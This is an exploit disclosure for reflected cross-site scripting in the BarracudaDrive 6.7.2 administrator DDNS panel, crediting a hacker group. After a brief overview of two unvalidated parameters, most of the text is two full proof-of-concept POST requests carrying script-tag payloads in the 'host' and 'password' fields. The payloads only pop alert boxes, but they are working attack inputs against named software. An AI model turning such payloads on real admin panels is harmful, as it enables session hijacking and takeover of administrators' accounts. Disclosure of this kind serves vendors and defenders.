###############################################################################
#Exploit Title : BarracudaDrive 6.7.2 Administrator Panel Rflected Cross-Site Scripting
#Author        : Govind Singh aka NullCool
#Vendor        : http://barracudadrive.com 
#Software      : BarracudaDrive 6.7.2
#Date          : 15/06/2014
#Discovered At : IHT Lab ( 1ND14N H4X0R5 T34M ) 
#Love to       : error1046, DeadMan India, CyberGladiator, Amit Kumar Achina  
################################################################################

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
--=={ >:)o Overview of vulnerability o(:< }==--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

BarracudaDrive Multiple Reflected Cross-Site Scripting in ddns panel 

Reflected Cross-Site Scripting Vulnerabilities in BarracudaDrive, user input is not properly checked before submission.

1) "host" parameter to "/rtl/protected/admin/ddns/" is not properly verified before submission. This can be exploited to execute arbitrary scripts code.  

2) "password" parameter to "/rtl/protected/admin/ddns/" is not properly verified before submission. This can be exploited to execute arbitrary scripts code.


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
--=={ >:)o Proof of Concept: o(:< }==--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1).

Host=localhost:9357
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
Referer=http://localhost:9357/rtl/protected/admin/ddns/
Cookie=tzone=--330; __utma=111872281.147155010.1402786769.1402791987.1402794883.3; __utmz=111872281.1402786769.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=111872281.3.10.1402794883; z9ZAqJtI=d4efe303539cfccc; __utmc=111872281
Connection=keep-alive
Content-Type=application/x-www-form-urlencoded
Content-Length=81
POSTDATA=provider=DNSdynamic&host="><script>alert(123);</script>&username=%3E&password=%3E

Poc image : http://prntscr.com/3sym87

2).

Host=localhost:9357
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
Referer=http://localhost:9357/rtl/protected/admin/ddns/
Cookie=tzone=--330; __utma=111872281.147155010.1402786769.1402791987.1402794883.3; __utmz=111872281.1402786769.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=111872281.3.10.1402794883; z9ZAqJtI=d4efe303539cfccc; __utmc=111872281
Connection=keep-alive
Content-Type=application/x-www-form-urlencoded
Content-Length=78
POSTDATA=provider=DNSdynamic&host=&username=%3E&password="><script>alert('Govind Singh');</script>

Poc Image : http://prntscr.com/3symgz